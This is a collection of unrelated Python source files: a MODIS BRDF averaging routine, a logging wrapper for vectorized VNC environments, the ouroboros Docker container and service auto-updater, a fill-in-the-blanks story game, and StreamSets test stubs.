    brdf_dir_list = sorted(os.listdir(brdf_primary_path))
    try:
        brdf_dir_range = [brdf_dir_list[0], brdf_dir_list[-1]]
        brdf_range = [datetime.date(*[int(x) for x in y.split('.')])
                      for y in brdf_dir_range]
        # fallback when the scene predates definitive MODIS data or postdates
        # the available archive
        fallback_brdf = (dt < DEFINITIVE_START_DATE or dt > brdf_range[1])
    except IndexError:
        fallback_brdf = True  # use fallback data if all goes wrong
    if fallback_brdf:
        brdf_base_dir = brdf_secondary_path
        brdf_dirs = get_brdf_dirs_fallback(brdf_base_dir, dt)
    else:
        brdf_base_dir = brdf_primary_path
        brdf_dirs = get_brdf_dirs_modis(brdf_base_dir, dt)
    # get all HDF files in the input dir
    dbDir = pjoin(brdf_base_dir, brdf_dirs)
    tile_list = [pjoin(folder, f)
                 for (folder, _, filelist) in os.walk(dbDir) for f in filelist if f.endswith(".h5")]
    src_poly, src_crs = valid_region(acquisition)
    src_crs = rasterio.crs.CRS(**src_crs)
    brdf_datasets = acquisition.brdf_datasets
    # Accumulate per-dataset tile summaries, then reduce each to its mean.
    tally = {}
    with rasterio.open(brdf_ocean_mask_path, 'r') as fid_mask:
        for ds in brdf_datasets:
            tally[ds] = BrdfTileSummary.empty()
            for tile in tile_list:
                with h5py.File(tile, 'r') as fid:
                    tally[ds] += load_brdf_tile(src_poly, src_crs, fid, ds, fid_mask)
            tally[ds] = tally[ds].mean()
    # Average the per-dataset means and collect the contributing source ids.
    results = {param: dict(data_source='BRDF',
                           id=np.array(list({ds_id for ds in brdf_datasets for ds_id in tally[ds][param]['id']}),
                                       dtype=VLEN_STRING),
                           value=np.mean([tally[ds][param]['value'] for ds in brdf_datasets]).item(),
                           tier=BrdfTier.FALLBACK_DATASET.name if fallback_brdf else BrdfTier.DEFINITIVE.name)
               for param in BrdfDirectionalParameters}
    return results
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
import logging
import numpy as np
import six
import time
from jiminy import vectorized
from jiminy.utils import display
logger = logging.getLogger(__name__)
extra_logger = logging.getLogger('jiminy.extra.'+__name__)
def stats(count):
    """Return 'mean±std' (one decimal each) over all values in *count*.

    :param count: iterable of iterables of numbers (e.g. per-env sample lists)
    :return: formatted summary string, or '(empty)' when there are no samples
    """
    # Local import keeps this edit self-contained; previously the third-party
    # `six` package was used just for this one version check.
    import sys
    flat = [e for vals in count for e in vals]
    if not flat:
        return '(empty)'
    s = '%0.1f±%0.1f' % (np.mean(flat), np.std(flat))
    if sys.version_info[0] == 2:
        # There is not a great way to backport Unicode support to Python 2.
        # We don't use it much, anyway. Easier just not to try.
        s = s.replace('±', '+-')
    return s
class Logger(vectorized.Wrapper):
    """Vectorized env wrapper that periodically logs throughput/lag statistics.

    Accumulates per-step diagnostics (action/observation/reward lags, VNC
    update counts, rewards) for each of the n sub-environments and emits an
    aggregate log line roughly every `print_frequency` seconds. Pass
    `print_frequency=None` to disable logging entirely.
    """
    metadata = {
        'configure.required': True
    }

    def __init__(self, env, print_frequency=5):
        super(Logger, self).__init__(env)
        self.print_frequency = print_frequency
        extra_logger.info('Running VNC environments with Logger set to print_frequency=%s. To change this, pass "print_frequency=k" or "print_frequency=None" to "env.configure".', self.print_frequency)
        # self.n comes from the vectorized wrapper; it may be None until the
        # env has been configured, in which case state is cleared in configure().
        if self.n is not None:
            self._clear_step_state()
        self._last_step_time = None

    def configure(self, **kwargs):
        """Configure the wrapped env, then reset all accumulated statistics."""
        self.env.configure(**kwargs)
        self._clear_step_state()

    def _clear_step_state(self):
        """Reset all per-interval counters and per-env lag accumulators."""
        self.frames = 0
        self.last_print = time.time()
        # time between action being sent and processed
        self.action_lag_n = [[] for _ in range(self.n)]
        # time between observation being generated on the server and being passed to add_metadata
        self.observation_lag_n = [[] for _ in range(self.n)]
        # time between observation being passed to add_metadata and being returned to Logger
        self.processing_lag = []
        # time between observation being returned by Logger and then action being passed to Throttle
        self.thinking_lag = []
        self.vnc_updates_n = [[] for _ in range(self.n)]
        self.vnc_bytes_n = [[] for _ in range(self.n)]
        self.vnc_pixels_n = [[] for _ in range(self.n)]
        self.reward_count_n = [[] for _ in range(self.n)]
        self.reward_total_n = [[] for _ in range(self.n)]
        self.reward_lag_n = [[] for _ in range(self.n)]
        self.rewarder_message_lag_n = [[] for _ in range(self.n)]

    def _step(self, action_n):
        """Step the wrapped env, record diagnostics, and periodically log them."""
        observation_n, reward_n, done_n, info = self.env.step(action_n)
        if self.print_frequency is None:
            return observation_n, reward_n, done_n, info
        last_step_time = self._last_step_time
        self._last_step_time = time.time()

        # Printing
        self.frames += 1
        delta = time.time() - self.last_print
        if delta > self.print_frequency:
            fps = self.frames/delta
            # Displayed independently
            # action_lag = ','.join([diagnostics.display_timestamps_pair_max(action_lag) for action_lag in self.action_lag_n])
            # observation_lag = ','.join([diagnostics.display_timestamps_pair_max(observation_lag) for observation_lag in self.observation_lag_n])
            flat = False
            # Smooshed together
            action_lag, action_data = display.compute_timestamps_pair_max(self.action_lag_n, flat=flat)
            observation_lag, observation_data = display.compute_timestamps_pair_max(self.observation_lag_n, flat=flat)
            processing_lag, processing_data = display.compute_timestamps_sigma(self.processing_lag)
            thinking_lag, thinking_data = display.compute_timestamps_sigma(self.thinking_lag)
            reward_count = [sum(r) / delta for r in self.reward_count_n]
            if flat and len(reward_count) > 0:
                reward_count = np.mean(reward_count)
            reward_total = [sum(r) / delta for r in self.reward_total_n]
            if flat and len(reward_total) > 0:
                reward_total = np.mean(reward_total)
            reward_lag, reward_data = display.compute_timestamps_pair_max(self.reward_lag_n, flat=flat)
            rewarder_message_lag, rewarder_message_data = display.compute_timestamps_pair_max(self.rewarder_message_lag_n, flat=flat)
            vnc_updates_count = [sum(v) / delta for v in self.vnc_updates_n]
            if flat and len(vnc_updates_count) > 0:
                vnc_updates_count = np.mean(vnc_updates_count)
            # Always aggregate these ones
            # BUG FIX: use builtin sum -- np.sum over a generator is deprecated
            # in numpy (it silently fell back to the builtin with a warning).
            if len(self.vnc_bytes_n) > 0:
                vnc_bytes_count = sum(e for vnc_bytes in self.vnc_bytes_n for e in vnc_bytes) / delta
            else:
                vnc_bytes_count = None
            if len(self.vnc_pixels_n) > 0:
                vnc_pixels_count = sum(e for vnc_pixels in self.vnc_pixels_n for e in vnc_pixels) / delta
            else:
                vnc_pixels_count = None
            # NOTE(review): these summaries are computed but never logged below;
            # kept (stats() is side-effect free) pending confirmation of intent.
            reward_stats = stats(self.reward_count_n)
            vnc_updates_stats = stats(self.vnc_updates_n)
            vnc_bytes_stats = stats(self.vnc_bytes_n)
            vnc_pixels_stats = stats(self.vnc_pixels_n)
            reaction_time = []
            for a, o in zip(action_data, observation_data):
                try:
                    value = thinking_data['mean'] + processing_data['mean'] + a['mean'] + o['mean']
                except KeyError:
                    # some component had no samples this interval
                    reaction_time.append(None)
                else:
                    reaction_time.append(display.display_timestamp(value))
            log = []
            for key, spec, value in [
                    ('vnc_updates_ps', '%0.1f', vnc_updates_count),
                    ('n', '%s', self.n),
                    ('reaction_time', '%s', reaction_time),
                    ('observation_lag', '%s', observation_lag),
                    ('action_lag', '%s', action_lag),
                    ('processing_lag', '%s', processing_lag),
                    ('thinking_lag', '%s', thinking_lag),
                    ('reward_ps', '%0.1f', reward_count),
                    ('reward_total', '%0.1f', reward_total),
                    ('vnc_bytes_ps[total]', '%0.1f', vnc_bytes_count),
                    ('vnc_pixels_ps[total]', '%0.1f', vnc_pixels_count),
                    ('reward_lag', '%s', reward_lag),
                    ('rewarder_message_lag', '%s', rewarder_message_lag),
                    ('fps', '%0.2f', fps),
            ]:
                # idiom fix: identity comparison for None
                if value is None:
                    continue
                if isinstance(value, list):
                    value = ','.join(spec % v for v in value)
                else:
                    value = spec % value
                log.append('%s=%s' % (key, value))
            if not log:
                log.append('(empty)')
            if self.frames != 0:
                logger.info('Stats for the past %.2fs: %s', delta, ' '.join(log))
            self._clear_step_state()

        # These are properties of the step rather than any one index
        observation_available_at = info.get('throttle.observation.available_at')
        if observation_available_at is not None:
            # (approximate time that we're going to return -- i.e. now, assuming Logger is fast)
            # - (time that the observation was passed to add_metadata)
            self.processing_lag.append(self._last_step_time - observation_available_at)
        action_available_at = info.get('throttle.action.available_at')
        if action_available_at is not None and last_step_time is not None:
            # (time that the action was generated) - (approximate time that we last returned)
            self.thinking_lag.append(action_available_at - last_step_time)

        # Saving of lags
        for i, info_i in enumerate(info['n']):
            observation_lag = info_i.get('stats.gauges.diagnostics.lag.observation')
            if observation_lag is not None:
                self.observation_lag_n[i].append(observation_lag)
            action_lag = info_i.get('stats.gauges.diagnostics.lag.action')
            if action_lag is not None:
                self.action_lag_n[i].append(action_lag)
            reward_count = info_i.get('reward.count')
            if reward_count is not None:
                self.reward_count_n[i].append(reward_count)
            reward_total = reward_n[i]
            if reward_total is not None:
                self.reward_total_n[i].append(reward_total)
            assert 'vnc.updates.n' not in info, 'Looks like you are using an old go-vncdriver. Please update to >=0.4.0: pip install --ignore-installed --no-cache-dir go-vncdriver'
            vnc_updates = info_i.get('stats.vnc.updates.n')
            if vnc_updates is not None:
                self.vnc_updates_n[i].append(vnc_updates)
            vnc_bytes = info_i.get('stats.vnc.updates.bytes')
            if vnc_bytes is not None:
                self.vnc_bytes_n[i].append(vnc_bytes)
            vnc_pixels = info_i.get('stats.vnc.updates.pixels')
            if vnc_pixels is not None:
                self.vnc_pixels_n[i].append(vnc_pixels)
            reward_lag = info_i.get('stats.gauges.diagnostics.lag.reward')
            if reward_lag is not None:
                self.reward_lag_n[i].append(reward_lag)
            rewarder_message_lag = info_i.get('stats.gauges.diagnostics.lag.rewarder_message')
            if rewarder_message_lag is not None:
                self.rewarder_message_lag_n[i].append(rewarder_message_lag)
        return observation_n, reward_n, done_n, info
|
<reponame>TaixMiguel/ouroboros<filename>pyouroboros/dockerclient.py
from time import sleep
from logging import getLogger
from docker import DockerClient, tls
from os.path import isdir, isfile, join
from docker.errors import DockerException, APIError, NotFound
from pyouroboros.helpers import set_properties, remove_sha_prefix, get_digest
class Docker(object):
    """Owns one Docker API connection plus the shared ouroboros managers.

    Holds the parsed config, the socket URL it connects to, and the data /
    notification managers used by the Container and Service updaters.
    """
    def __init__(self, socket, config, data_manager, notification_manager):
        self.config = config
        self.socket = socket
        # Connect immediately; an invalid TLS setup falls back to unsecured.
        self.client = self.connect()
        self.data_manager = data_manager
        self.logger = getLogger()
        self.notification_manager = notification_manager

    def connect(self):
        """Return a DockerClient for self.socket, using TLS when configured.

        Certificates are expected under /etc/docker/certs.d/<host>/ as
        client.cert, client.key and ca.crt.  Any missing piece logs an
        error and reverts to an unsecured connection.
        """
        if self.config.docker_tls:
            try:
                cert_paths = {
                    'cert_top_dir': '/etc/docker/certs.d/',
                    # Strip the scheme ("tcp://host:port" -> "host:port").
                    'clean_socket': self.socket.split('//')[1]
                }
                cert_paths['cert_dir'] = join(cert_paths['cert_top_dir'], cert_paths['clean_socket'])
                cert_paths['cert_files'] = {
                    'client_cert': join(cert_paths['cert_dir'], 'client.cert'),
                    'client_key': join(cert_paths['cert_dir'], 'client.key'),
                    'ca_crt': join(cert_paths['cert_dir'], 'ca.crt')
                }
                if not isdir(cert_paths['cert_dir']):
                    self.logger.error('%s is not a valid cert folder', cert_paths['cert_dir'])
                    raise ValueError
                for cert_file in cert_paths['cert_files'].values():
                    if not isfile(cert_file):
                        self.logger.error('%s does not exist', cert_file)
                        raise ValueError
                tls_config = tls.TLSConfig(
                    ca_cert=cert_paths['cert_files']['ca_crt'],
                    verify=cert_paths['cert_files']['ca_crt'] if self.config.docker_tls_verify else False,
                    client_cert=(cert_paths['cert_files']['client_cert'], cert_paths['cert_files']['client_key'])
                )
                client = DockerClient(base_url=self.socket, tls=tls_config)
            except ValueError:
                self.logger.error('Invalid Docker TLS config for %s, reverting to unsecured', self.socket)
                client = DockerClient(base_url=self.socket)
        else:
            client = DockerClient(base_url=self.socket)
        return client
class BaseImageObject(object):
    """Shared state and image-pull logic for the Container/Service updaters.

    Copies the frequently used handles (logger, config, client, socket,
    data manager) off the owning Docker wrapper and initialises this
    socket's update counter.
    """
    def __init__(self, docker_client):
        self.docker = docker_client
        self.logger = self.docker.logger
        self.config = self.docker.config
        self.client = self.docker.client
        self.socket = self.docker.socket
        self.data_manager = self.docker.data_manager
        self.data_manager.total_updated[self.socket] = 0
        self.notification_manager = self.docker.notification_manager

    def _pull(self, tag):
        """Docker pull image tag.

        Returns the pulled Image (or RegistryData in dry-run mode).
        Raises ConnectionError for any pull problem the caller should
        skip, and exits the process on hard authentication failures.
        """
        self.logger.debug('Checking tag: %s', tag)
        try:
            if self.config.dry_run:
                # The authentication doesn't work with this call
                # See bugs https://github.com/docker/docker-py/issues/2225
                return self.client.images.get_registry_data(tag)
            if self.config.auth_json:
                return self.client.images.pull(tag, auth_config=self.config.auth_json)
            return self.client.images.pull(tag)
        except APIError as e:
            message = str(e)
            if '<html>' in message:
                self.logger.debug("Docker api issue. Ignoring")
                raise ConnectionError
            elif 'unauthorized' in message:
                if self.config.dry_run:
                    self.logger.error('dry run : Upstream authentication issue while checking %s. See: '
                                      'https://github.com/docker/docker-py/issues/2225', tag)
                    raise ConnectionError
                else:
                    self.logger.critical("Invalid Credentials. Exiting")
                    exit(1)
            elif 'Client.Timeout' in message:
                self.logger.critical(
                    "Couldn't find an image on docker.com for %s. Local Build?", tag)
                raise ConnectionError
            # BUG FIX: the original tested `('pull access' or 'TLS handshake')
            # in message`, which always evaluates to 'pull access' and never
            # checked for TLS handshake failures.
            elif 'pull access' in message or 'TLS handshake' in message:
                self.logger.critical("Couldn't pull. Skipping. Error: %s", e)
                raise ConnectionError
            else:
                # Previously an unmatched APIError was silently swallowed and
                # the method returned None; surface it as a skippable error.
                self.logger.error("Unhandled Docker API error for %s: %s", tag, e)
                raise ConnectionError
class Container(BaseImageObject):
    """Watches running containers on one socket and recreates them when a
    newer image is available, honouring ouroboros labels and dependencies."""
    mode = 'container'

    def __init__(self, docker_client):
        super().__init__(docker_client)
        self.monitored = self.monitor_filter()

    # Container sub functions
    def stop(self, container):
        """Stop a container, honouring an optional com.ouroboros.stop_signal label."""
        self.logger.debug('Stopping container: %s', container.name)
        stop_signal = container.labels.get('com.ouroboros.stop_signal', False)
        if stop_signal:
            try:
                container.kill(signal=stop_signal)
            except APIError as e:
                # Fall back to a regular stop if the custom signal fails.
                self.logger.error('Cannot kill container using signal %s. stopping normally. Error: %s',
                                  stop_signal, e)
                container.stop()
        else:
            container.stop()

    def remove(self, container):
        """Remove a (stopped) container; a missing container is only logged."""
        self.logger.debug('Removing container: %s', container.name)
        try:
            container.remove()
        except NotFound as e:
            self.logger.error("Could not remove container. Error: %s", e)
            return

    def recreate(self, container, latest_image):
        """Replace `container` with one built from `latest_image`, re-attaching
        every network of the old container (keeping static IPs where allowed)."""
        new_config = set_properties(old=container, new=latest_image)
        self.stop(container)
        self.remove(container)
        created = self.client.api.create_container(**new_config)
        new_container = self.client.containers.get(created.get("Id"))
        # connect the new container to all networks of the old container
        for network_name, network_config in container.attrs['NetworkSettings']['Networks'].items():
            network = self.client.networks.get(network_config['NetworkID'])
            try:
                # Drop any automatic attachment so we can reconnect with the
                # old container's aliases/links/addresses.
                network.disconnect(new_container.id, force=True)
            except APIError:
                pass
            new_network_config = {
                'container': new_container,
                'aliases': network_config['Aliases'],
                'links': network_config['Links']
            }
            if network_config['IPAMConfig']:
                new_network_config.update(
                    {
                        'ipv4_address': network_config['IPAddress'],
                        'ipv6_address': network_config['GlobalIPv6Address']
                    }
                )
            try:
                network.connect(**new_network_config)
            except APIError as e:
                if any(err in str(e) for err in ['user configured subnets', 'user defined networks']):
                    # This network does not allow static addresses; retry without them.
                    if new_network_config.get('ipv4_address'):
                        del new_network_config['ipv4_address']
                    if new_network_config.get('ipv6_address'):
                        del new_network_config['ipv6_address']
                    network.connect(**new_network_config)
                else:
                    self.logger.error('Unable to attach updated container to network "%s". Error: %s', network.name, e)
        new_container.start()

    def pull(self, current_tag):
        """Docker pull image tag"""
        tag = current_tag
        if not tag:
            self.logger.error('Missing tag. Skipping...')
            raise ConnectionError
        elif ':' not in tag:
            # A bare repository name implicitly means :latest.
            tag = f'{tag}:latest'
        return self._pull(tag)

    # Filters
    def running_filter(self):
        """Return running container objects list, except ouroboros itself"""
        running_containers = []
        try:
            for container in self.client.containers.list(filters={'status': 'running'}):
                if self.config.self_update:
                    # With self-update enabled, ouroboros monitors itself too.
                    running_containers.append(container)
                else:
                    try:
                        if 'ouroboros' not in container.image.tags[0]:
                            if container.attrs['HostConfig']['AutoRemove']:
                                # --rm containers vanish on stop; recreating
                                # them would fail, so skip.
                                self.logger.debug("Skipping %s due to --rm property.", container.name)
                            else:
                                running_containers.append(container)
                    except IndexError:
                        # container.image.tags was empty (dangling image).
                        self.logger.error("%s has no tags.. you should clean it up! Ignoring.", container.id)
                        continue
        except DockerException:
            self.logger.critical("Can't connect to Docker API at %s", self.config.docker_socket)
            exit(1)
        return running_containers

    def monitor_filter(self):
        """Return filtered running container objects list"""
        running_containers = self.running_filter()
        monitored_containers = []
        for container in running_containers:
            ouro_label = container.labels.get('com.ouroboros.enable', False)
            # if labels enabled, use the label. 'true/yes' trigger monitoring.
            if self.config.label_enable and ouro_label:
                if ouro_label.lower() in ["true", "yes"]:
                    monitored_containers.append(container)
                else:
                    continue
            elif not self.config.labels_only:
                if self.config.monitor:
                    # Explicit monitor list: must be listed and not ignored.
                    if container.name in self.config.monitor and container.name not in self.config.ignore:
                        monitored_containers.append(container)
                elif container.name not in self.config.ignore:
                    monitored_containers.append(container)
        self.data_manager.monitored_containers[self.socket] = len(monitored_containers)
        self.data_manager.set(self.socket)
        return monitored_containers

    # Socket Functions
    def self_check(self):
        """After a self-update hand-off, clean up the duplicate ouroboros copy."""
        if self.config.self_update:
            me_list = [container for container in self.client.containers.list() if 'ouroboros' in container.name]
            if len(me_list) > 1:
                self.update_self(count=2, me_list=me_list)

    def socket_check(self):
        """Return (updateable, depends_on, hard_depends_on) for this socket,
        or None (implicitly) when nothing is monitored."""
        depends_on_names = []
        hard_depends_on_names = []
        updateable = []
        self.monitored = self.monitor_filter()
        if not self.monitored:
            self.logger.info('No containers are running or monitored on %s', self.socket)
            return
        for container in self.monitored:
            current_image = container.image
            current_tag = container.attrs['Config']['Image']
            try:
                latest_image = self.pull(current_tag)
            except ConnectionError:
                continue
            try:
                if current_image.id != latest_image.id:
                    updateable.append((container, current_image, latest_image))
                else:
                    continue
            except AttributeError:
                # NOTE(review): there is no `continue` here, so a container
                # whose tag could not be inspected still contributes its
                # depends_on labels below -- confirm that is intended.
                self.logger.error("Issue detecting %s's image tag. Skipping...", container.name)
            # Get container list to restart after update complete
            depends_on = container.labels.get('com.ouroboros.depends_on', False)
            hard_depends_on = container.labels.get('com.ouroboros.hard_depends_on', False)
            if depends_on:
                depends_on_names.extend([name.strip() for name in depends_on.split(',')])
            if hard_depends_on:
                hard_depends_on_names.extend([name.strip() for name in hard_depends_on.split(',')])
        hard_depends_on_containers = []
        hard_depends_on_names = list(set(hard_depends_on_names))
        for name in hard_depends_on_names:
            try:
                hard_depends_on_containers.append(self.client.containers.get(name))
            except NotFound:
                self.logger.error("Could not find dependant container %s on socket %s. Ignoring", name, self.socket)
        depends_on_containers = []
        depends_on_names = list(set(depends_on_names))
        # Hard dependencies take precedence over soft ones.
        depends_on_names = [name for name in depends_on_names if name not in hard_depends_on_names]
        for name in depends_on_names:
            try:
                depends_on_containers.append(self.client.containers.get(name))
            except NotFound:
                self.logger.error("Could not find dependant container %s on socket %s. Ignoring", name, self.socket)
        return updateable, depends_on_containers, hard_depends_on_containers

    def update(self):
        """Stop dependents, recreate every updateable container, restart (or
        recreate) the dependents, and send notifications."""
        updated_count = 0
        try:
            updateable, depends_on_containers, hard_depends_on_containers = self.socket_check()
        except TypeError:
            # socket_check() returned None because nothing is monitored.
            return
        for container in depends_on_containers + hard_depends_on_containers:
            self.stop(container)
        for container, current_image, latest_image in updateable:
            if self.config.dry_run:
                # Ugly hack for repo digest
                # NOTE(review): raises IndexError if the image has no RepoDigests.
                repo_digest_id = current_image.attrs['RepoDigests'][0].split('@')[1]
                if repo_digest_id != latest_image.id:
                    self.logger.info('dry run : %s would be updated', container.name)
                continue
            if container.name in ['ouroboros', 'ouroboros-updated']:
                # Updating ourselves: count it, notify, then hand off to a clone.
                self.data_manager.total_updated[self.socket] += 1
                self.data_manager.add(label=container.name, socket=self.socket)
                self.data_manager.add(label='all', socket=self.socket)
                self.notification_manager.send(container_tuples=updateable,
                                               socket=self.socket, kind='update')
                self.update_self(old_container=container, new_image=latest_image, count=1)
            self.logger.info('%s will be updated', container.name)
            self.recreate(container, latest_image)
            if self.config.cleanup:
                try:
                    self.client.images.remove(current_image.id)
                except APIError as e:
                    self.logger.error("Could not delete old image for %s, Error: %s", container.name, e)
            updated_count += 1
            self.logger.debug("Incrementing total container updated count")
            self.data_manager.total_updated[self.socket] += 1
            self.data_manager.add(label=container.name, socket=self.socket)
            self.data_manager.add(label='all', socket=self.socket)
        for container in depends_on_containers:
            # Reload container to ensure it isn't referencing the old image
            container.reload()
            container.start()
        for container in hard_depends_on_containers:
            # Hard dependencies are fully recreated rather than just restarted.
            self.recreate(container, container.image)
        if updated_count > 0:
            self.notification_manager.send(container_tuples=updateable, socket=self.socket, kind='update')

    def update_self(self, count=None, old_container=None, me_list=None, new_image=None):
        """Handle ouroboros updating itself.

        count == 2: two copies are running after a hand-off; remove the
        older one and its image.
        count == 1: spawn a replacement ouroboros from `new_image` and give
        it time to take over.
        """
        if count == 2:
            self.logger.debug('God im messy... cleaning myself up.')
            # 'Created' is an ISO timestamp string, so < orders chronologically.
            old_me_id = me_list[0].id if me_list[0].attrs['Created'] < me_list[1].attrs['Created'] else me_list[1].id
            old_me = self.client.containers.get(old_me_id)
            old_me_image_id = old_me.image.id
            old_me.stop()
            old_me.remove()
            self.client.images.remove(old_me_image_id)
            self.logger.debug('Ahhh. All better.')
            self.monitored = self.monitor_filter()
        elif count == 1:
            self.logger.debug('I need to update! Starting the ouroboros ;)')
            # Alternate between two names so the clone never collides with us.
            self_name = 'ouroboros-updated' if old_container.name == 'ouroboros' else 'ouroboros'
            new_config = set_properties(old=old_container, new=new_image, self_name=self_name)
            try:
                me_created = self.client.api.create_container(**new_config)
                new_me = self.client.containers.get(me_created.get("Id"))
                new_me.start()
                self.logger.debug('If you strike me down, I shall become '
                                  'more powerful than you could possibly imagine.')
                self.logger.debug('https://bit.ly/2VVY7GH')
                # Give the replacement time to come up and take over.
                sleep(30)
            except APIError as e:
                self.logger.error("Self update failed.")
                self.logger.error(e)
class Service(BaseImageObject):
    """Watches swarm services labelled com.ouroboros.enable and rolls them
    onto a new image digest when the registry copy changes."""
    mode = 'service'

    def __init__(self, docker_client):
        super().__init__(docker_client)
        self.monitored = self.monitor_filter()

    def monitor_filter(self):
        """Return filtered service objects list"""
        # Only services carrying the enable label are even listed.
        services = self.client.services.list(filters={'label': 'com.ouroboros.enable'})
        monitored_services = []
        for service in services:
            ouro_label = service.attrs['Spec']['Labels'].get('com.ouroboros.enable')
            # When label_enable is off, every labelled service is monitored;
            # otherwise the label value must be "true"/"yes".
            if not self.config.label_enable or ouro_label.lower() in ["true", "yes"]:
                monitored_services.append(service)
        self.data_manager.monitored_containers[self.socket] = len(monitored_services)
        self.data_manager.set(self.socket)
        return monitored_services

    def pull(self, tag):
        """Docker pull image tag"""
        return self._pull(tag)

    def update(self):
        """Compare each monitored service's pinned digest against the registry
        and update the service in place when it differs."""
        updated_service_tuples = []
        self.monitored = self.monitor_filter()
        if not self.monitored:
            self.logger.info('No services monitored')
        for service in self.monitored:
            image_string = service.attrs['Spec']['TaskTemplate']['ContainerSpec']['Image']
            if '@' in image_string:
                # Services are expected to pin "repo:tag@sha256:<digest>".
                tag = image_string.split('@')[0]
                sha256 = remove_sha_prefix(image_string.split('@')[1])
            else:
                self.logger.error('No image SHA for %s. Skipping', image_string)
                continue
            try:
                latest_image = self.pull(tag)
            except ConnectionError:
                continue
            latest_image_sha256 = get_digest(latest_image)
            self.logger.debug('Latest sha256 for %s is %s', tag, latest_image_sha256)
            if sha256 != latest_image_sha256:
                if self.config.dry_run:
                    # Ugly hack for repo digest
                    self.logger.info('dry run : %s would be updated', service.name)
                    continue
                updated_service_tuples.append(
                    (service, sha256[-10:], latest_image)
                )
                if 'ouroboros' in service.name and self.config.self_update:
                    # Count and notify before the service update replaces us.
                    self.data_manager.total_updated[self.socket] += 1
                    self.data_manager.add(label=service.name, socket=self.socket)
                    self.data_manager.add(label='all', socket=self.socket)
                    self.notification_manager.send(container_tuples=updated_service_tuples,
                                                   socket=self.socket, kind='update', mode='service')
                self.logger.info('%s will be updated', service.name)
                service.update(image=f"{tag}@sha256:{latest_image_sha256}")
                self.data_manager.total_updated[self.socket] += 1
                self.data_manager.add(label=service.name, socket=self.socket)
                self.data_manager.add(label='all', socket=self.socket)
        if updated_service_tuples:
            self.notification_manager.send(
                container_tuples=updated_service_tuples,
                socket=self.socket,
                kind='update',
                mode='service'
            )
|
# IPND Stage 2 Final Project
# Titles for the story; indices line up with the *_story/*_answers pairs below.
titles = ["A Bunny Story", "Kites", "The Cat"]
# A Bunny Story fill-in-the-blanks and its corresponding answers.
# Blank __N__ in the story is answered by answers[N-1].
bunny_story = "Once there was an ugly __1__ named Kevin. He was __2__ and nobody liked him. One day there was a Bhutan Marathon and the ugly bunny __3__ it. He got a __4__ and then everybody liked him. He made lots of new __5__ and lived happily ever after."
bunny_answers = ["bunny", "ugly", "won", "medal", "friends"]
# Kites story fill-in-the-blanks and its corresponding answers
kites_story = "There was once a boy called Sam. He was very __1__. He lived with his __2__ named Sigrid. One day he found __3__ gold coins and __4__ silver coins. Then he went and bought some paper and crayons, made __5__ kites and sold them. Then he took the money and bought a wardrobe, a car, a black dress for his mom and lots of gifts for his house and became very __6__."
kites_answers = ["poor", "mother", "50", "25", "1000", "rich"]
# The Cat story fill-in-the-blanks and its corresponding answers
cat_story = "Once upon a time there was a __1__ named Susan. She __2__ cats. She __3__ had a cat before but one day she got a cat for her now and then. The cat's name was Harry. Susan loved Harry. She __4__ with it and __5__ it sooo much. Her __6__ named Robb, disliked the cat but her mom loved it. Susan __7__ it and loved it so much. They all lived very ever after."
cat_answers = ["girl", "loved", "never", "slept", "loved", "dad", "pet"]
def load_fib_category():
    """
    Asks the user for a category and loads that story's data.

    Prints the chosen title and story, then hands off to guess_check to
    run the fill-in-the-blank quiz.  An unrecognised category re-prompts
    recursively.
    """
    category = raw_input("\nPlease select a category for the story (bunny, kites, cat): ")
    # Map each category keyword to its (title, story, answers) triple.
    catalogue = {"bunny": (titles[0], bunny_story, bunny_answers),
                 "kites": (titles[1], kites_story, kites_answers),
                 "cat": (titles[2], cat_story, cat_answers)}
    choice = category.lower()
    if choice in catalogue:
        title, story, answers = catalogue[choice]
        print "\n" + title
        print "\n" + story
        return guess_check(title, story, answers)
    print "You selected an invalid category!"
    return load_fib_category()
def guess_check(title, prompt, answers):
    """
    Runs the fill-in-the-blank quiz for one story.

    Repeatedly prompts for the current blank.  A correct guess substitutes
    it into the story and advances to the next blank; a wrong guess shows
    the story again and re-asks the same blank.

    Args:
        title (str) : the title for the story selected.
        prompt (str) : the story text with __N__ placeholders.
        answers (list of str) : expected answer for each blank, in order.
    """
    blank_number = 1
    total_blanks = len(answers)
    while blank_number <= total_blanks:
        guess = raw_input("\nWhat is the answer to __" + str(blank_number) + "__? ")
        if guess != answers[blank_number - 1]:
            # Wrong guess: show the current state and ask the same blank again.
            print "Try again.\n" + "\n" + title + "\n\n" + prompt
            continue
        print "Good job!" + "\n"
        prompt = prompt.replace("__" + str(blank_number) + "__", guess)
        blank_number += 1
        print title + "\n\n" + prompt
    print "Congratulations, you have filled in all of the blanks!"
def play_game():
    """
    Plays a full game of fill-in-the-blanks.

    Runs one round, then asks whether to play again; any affirmative
    answer recurses into another round, anything else ends the game.
    """
    load_fib_category()
    affirmative = ['yes', 'YES', 'y', 'Y']
    answer = raw_input("Would you play another round? (yes/no) : ")
    if answer in affirmative:
        play_game()
    else:
        print "Thanks for playing!"
# Start the first round as soon as the script runs.
play_game()
|
<reponame>Sentienz/datacollector-tests
import pytest
from streamsets.testframework.decorators import stub
@stub
@pytest.mark.parametrize('stage_attributes', [{'add_unsupported_fields_to_records': False},
                                              {'add_unsupported_fields_to_records': True}])
def test_add_unsupported_fields_to_records(sdc_builder, sdc_executor, stage_attributes):
    """Stub: cover both settings of 'add unsupported fields to records'."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True}])
def test_additional_jdbc_configuration_properties(sdc_builder, sdc_executor, stage_attributes):
    """Stub: exercise extra JDBC properties when resolving schema from DB."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'case_sensitive_names': False}, {'case_sensitive_names': True}])
def test_case_sensitive_names(sdc_builder, sdc_executor, stage_attributes):
    """Stub: cover both settings of 'case sensitive names'."""
    pass
@stub
def test_date_format(sdc_builder, sdc_executor):
    """Stub: exercise the stage's date format option."""
    pass
@stub
def test_db_time_zone(sdc_builder, sdc_executor):
    """Stub: exercise the stage's DB time zone option."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True}])
def test_jdbc_connection_string(sdc_builder, sdc_executor, stage_attributes):
    """Stub: exercise the JDBC connection string with DB schema resolution."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'on_record_error': 'DISCARD'},
                                              {'on_record_error': 'STOP_PIPELINE'},
                                              {'on_record_error': 'TO_ERROR'}])
def test_on_record_error(sdc_builder, sdc_executor, stage_attributes):
    """Stub: cover each on-record-error policy."""
    pass
